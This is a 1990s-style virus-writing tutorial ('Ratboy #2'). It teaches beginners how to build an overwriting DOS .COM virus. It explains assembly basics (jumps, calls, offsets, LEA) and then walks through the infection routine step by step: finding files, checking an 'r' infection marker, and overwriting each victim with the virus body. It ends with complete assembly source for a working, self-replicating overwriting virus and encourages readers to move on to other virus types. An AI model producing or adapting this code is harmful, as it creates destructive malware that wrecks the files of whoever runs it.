Overwriting virus tutorial #2
/\---/\ ( . . ) \ / WARNING: Information Contained Within Can Eat Both Your \ / ^^^^^^^ Mind, Hard Drive and your dog. \*/ I assume no responsiblity!!!!!! #
Hello everyone!!!! Considering I have gotten positive responses about Ratboy#1 I decided to continue on with your lessions in simple viruses. So what is in store for this issue? We will be going over some terms to help us in this issue. Also, we will move on to more complex overwriting .Com viruses. If you read and understood Ratboy#1, you should understand how to due simple file operations. Such as, you need to open the victum for reading and writing, and if you are a ATF agent you need to open the file to shoot it in the back like it was one of your own agents. You will read how to read from your file, write to it, "tag" it, and more helpful example code to help with your further learning of viruses. :) Yea!!
Now the boreing parts:
What is a JMP (jump)?
A jump is kinda like what it sounds like, a jump. Since we know that an assembly source reads top to bottom, sometimes we need to skip around in a program depending on the situation. Here's a simple example:
call delta_offset
delta_offset:
pop bp
sub bp,delta_offset
jmp restore ;<===this is a jump :)
eat_hd:
"blah"
"blah"
As you can see, in the example, we jumped over eat_hd and anything else that was between the jump and restore. A real simple explanation of how a jump works is like this. A jump when put together by the assembler, well be converted to a jump without the label but a displacement. Like this:
jmp anywhere
Really means jmp 45 bytes
As you can see the number is postive so it a foward jump (negative would be backwards). Now I think I'm getting too far, I just wanted you to understand it's a displacement. I'm not even going into conditional jumps since I did say in the Ratboy#1 you do need to understand Assembly. I know a lot of this should be old hat, but bare with me for now. :)
I was recently asked what is a CALL?
A call is like a jump with a return address. When a Call is made, the next line offset(address) is pushed into the stack, and a jump to the place called is made. Once there, you can return by using RET. This RET will pop the return address off the stack and jump there.
Simple example:
mov al,02h
call mov_ptr ;<==the next line's address it put into
;the stack (that would be eat_hd) and a
;jump is made to mov_ptr
eat_hd:
"blah"
"blah"
"blah"
jmp exit ;<==simple review, how does this work?
mov-ptr:
"blah"
"blah"
"blah"
ret ;ah..now the return address(eat_hd) is
;popped off the stack and a jump is made
;to it
Another question was what is an OFFSET?
Since we are so far just dealing with .Com files make this real simple. An offset is like an address. If you know where you live, then you understand how and address works. Simple Simple Example:
Where does Debby live?
Oh, on 16th St. and 5th Ave. (that is an example of an Offset)
Review:
Where does Debby live?
Oh, go down three blocks and the third house on the left.
(this is an example of a jump, see the displacement?)
Another question is what is LEA?
LEA stands for Load Effective Address. Yarn! Too technical. Here's how it works. Remember in Ratboy#1 when looking for a file, you needed to load the file type(*.com) offset into dx, like this:
mov dx,offset file_type
well you can do this instead:
lea dx,file_type
Nuff said. Practice with it, see its ranges of use.
Ok I know some one must have fallen asleep, if this bores you just go ahead and read Dark Angel's Virus Writing Guides, maybe they are up to speed with you.
How can I speed up my programs?
Simple, kinda think of speed as being the least amount of bytes nessary for you to carry out the job. example:
mov ax,0 ;3 bytes sub ax,ax ;2 bytes
So which one would you figure to be the faster. I used sub ax,ax since I don't want to even go into explaining XOR, but XOR AX,AX will do the samethin. Do some reading up on it, you'll need it for encryption later on in your virus writing carreer. The Sub should make sense, subtract a number from itself = 0.
Also here's another way of putting what is AX in BX.
Instead of saying:
mov bx,ax ;2 bytes
say:
xchg bx,ax ;1 byte
Ya get it?
Now down to the exciting part of doing something. Yea!!!!
Ok in the last issue if you made your virus and you noticed that it infected the first file and not any others, that's because it was real simple. This time we will teach your little life form how to determine if the file is already infected. Now how do you make sure you know which underwear are your's at summer camp, your mom sewed your name inside of them. If you are over 30 and your mom still does this, you are a geek. No arguements, you are a Geek.
Ok, we need to put in, the infected file, some type of marker, so that we can later read it. Let's keep this simple, since ofcourse that's the motive of this tutorial. I will use the letter "r" for RaTBoY. We will put that "infection marker" right after the jump. So it will kinda look like this:
virus_start:
jmp find_first
me db 'r'
find_first:
"blah"
"blah"
Ya see it? Now we will go on. Since to do it all you have to do is put the Me db 'r' in the front of your virus. Now we need to put that jump in there, for the file to go over the 'r' and start looking for the file. All the virus needs to do is read the first four bytes of a file, and check if the 4th (jmp + offset = 3bytes) byte to identify if it's already infected.
Now let's look at the order of operations. For you english majors this is outline. :)
- find file
- no files to infect...EXIT
- open file for reading
- read first four bytes
- close file
- compare to id byte(infection marker)
- if infected already:
- setup to find next file
- goto step I
- if not infected continue on
- if infected already:
- open file for read/write
- write self to file
- close file
- exit
Now that should not be such a differcult virus to make. Some of this material will be review for you and a chance to see if you can still understand everything clearly.
Step I
Now of course we need to find the first file. Here are the required inputs:
ah = 4eh cx = atributes dx = file type (ie. *.com) int 21h
if the carry flag is set then there were no files, so if: jc exit ;jump to exit if no files not bad if you can remember this off the top of your head. I think I went over this well enough in Ratboy#1, so not to bore you I go on.
Step II
Now we need to open that file to read and write to it. Inputs are:
ax = 3d00h ;remember the value of AL will setup ;for the access you want ;al = 00h(read only) ;al = 01h(write only) ;al = 02h(read/write) dx = offset address of file name int 21h Returns: ax = file handle (or error code..nah can't happen)
Now do you remember where we get that file name? Why of course you know this, it's in the DTA. Now since we didn't mess with it, it should be at 80h in the Program Segment Prefix (PSP). So if you know that and you've read Ratboy#1 where do we look for the address of the file name? That's right 9eh. Remember to put the file handle in BX where we will use it later(ie. xchg bx,ax) Since we went over this in Ratboy#1 we'll go on.
Step III
Now comes something new. We will read the first four bytes of the victum file, and put it in our buffer, HOLDN_PLACE. Here's the function's inputs:
ah = 3fh bx = file handle cx = bytes to read dx = offset of buffer(buffer = the place you put the read byte(s)) int 21h
Here's how it would look in your virus:
***Remember that at the end of step two we put the file handle in bx***
mov ah,3fh mov cx,4 lea dx,holdn_place int 21h
and ofcourse at the end to the virus:
holdn_place db ?,?,?,?
Step IV
Close up the file. So if it's infected, we just move on. If the file is not infected, we open it up for read and write access. Inputs:
ax = 3eh int 21h
Simple enough?
Step V
Now we will compare the four bytes of the possible victum to the id byte.
cmp byte ptr [holdn_place +3],'r' ;told ya I would use a 'r'
jnz open_it_again ;if not same then time to infect
mov ah,4fh ;now we set up ah with 4fh(find next)
;we could use a whole new find file routine but we will
;use the the one from find first, just that now ah=4fh
;if that confused you read the source for the setup.
Step VI
Now since it passed the test of not being infected, just reopen it. This time so we can write to it. :) Then inputs:
ax = 3d02h dx = offset of file name int 21h
Just to go over it one more time here's what it will look like:
mov ax,3d02h mov dx,9eh ;That's where the file name is in the DTA int 21h xchg bx,ax ;remember to put that file handle in BX :)
Step VII
Of course this write to victum part should be real old hat for ya, since this is the part that seperates a lame trojan from a |( 00\_ virus. write to file inputs:
ah = 40h(hey isn't that a magazine?) cx = number of bytes to write(size of virus) bx = file handle(victum) dx = offset address of buffer(beginning of virus)
If unfamiliar with writing to file, just wait and look over the source at the end of this file.
Step VIII
Close file....sorry if this is getting repetative, but that is the sign of you learning how to do this real well. Inputs:
ah = 3eh bx = file handle(victum)
Step IX
Exit. Here's a real easy way:
INT 20h
Well that is enough of that piece by piece construction. Let's look at the finish part.
;Ratboy tutorial over writer #2 virus
code segment ;these part should look familar
assume cs:code,ds:code
org 100h
virus proc near
virus_start:
jmp find_first
db 'r' ;there's that id byte
find_first: ;load ah with 4eh for finding first
mov ah,4eh ;file like the file_type
find_file:
xor cx,cx ;this put a 0 in cx, remember? The 0
;means look for normal attributes
lea dx,file_type ;sets up for what type of file we're
;looking for, *.com
int 21h
jc exit ;no files, time to leave.
open_file:
mov ax,3d00h ;open file found for reading from.
mov dx,9eh ;the file name is in the DTA
int 21h
xchg bx,ax ;remember that ax will return with the file
;handle, and we need that is bx :)
read_file:
mov ah,3fh ;read file
mov cx,4 ;four bytes
lea dx,holdn_place ;that's where it's going.... ;)
int 21h
close_it_up:
mov ah,3eh ;just like it says
int 21h
compare:
cmp byte ptr[holdn_place + 3],'r' ;check if there is a 'r'
jnz open_it_up_again ;not there ok let's infect
mov ah,4fh ;ok let's setup to look for another file
jmp find_file ;ah..you see how we will be using find_file
;but this time ah=4fh not 4eh. See how it's
;different, but the same.
open_it_up_again:
mov ax,3d02h ;Alright, we have a live one here!!!!
mov dx,9eh ;let's get that file name again
int 21h
xchg bx,ax ;yup, once again.
infect:
mov ah,40h
mov cx,offset endvx - offset virus_start
;the end minus the beginning gives the lenth
;of the virus. #of bytes to write.
lea dx,virus_start ;the virus's begining so this tells where to
;to start writing from and bx contains the
;file handle, where to write to.
int 21h
close_victum:
mov ah,3eh ;now let's close up the victum
int 21h
exit: int 20h ;time to exit, later!!!
file_type db "*.com",0
holdn_place db ?,?,?,?
endvx label near
virus endp
code ends
end virus_start
I really do hope that this tutoral has been helpful to you. Remember if you find this boring. Then you know enough write effective overwriting viruses, and you should move on to other types of virus.
Now remember the best teacher in virus writer is yourself practicing. So if you want to try something different, try it. Just don't do it in your DOS directory. :)
Also Included with this file: sources to overwriters and Ratboy viruses. You still need an Assembler, Bait files, a good reference book and not to forget good people to ask a lot of dumb questions to. Like I do. :)
Of course that usual ending where I thank all those that have helped me:
- GOD: I woke up breathing today. :)
- Mrs. Ratboy: For putting up with me ;)
- FC: For all the help dude!!!!!!!!!!!!
- Aristotle: No Aristotle I didn't mean you when I said GOD, but Thanks.
- M.P.: Love ya software, Invircible.
Thanks to these guys and groups: Virogen, Terminal Velocity, NuKE, Falcon, Vlad, Immortal Riot, P/S, ACVR, and every virus writer I didn't mention!!!
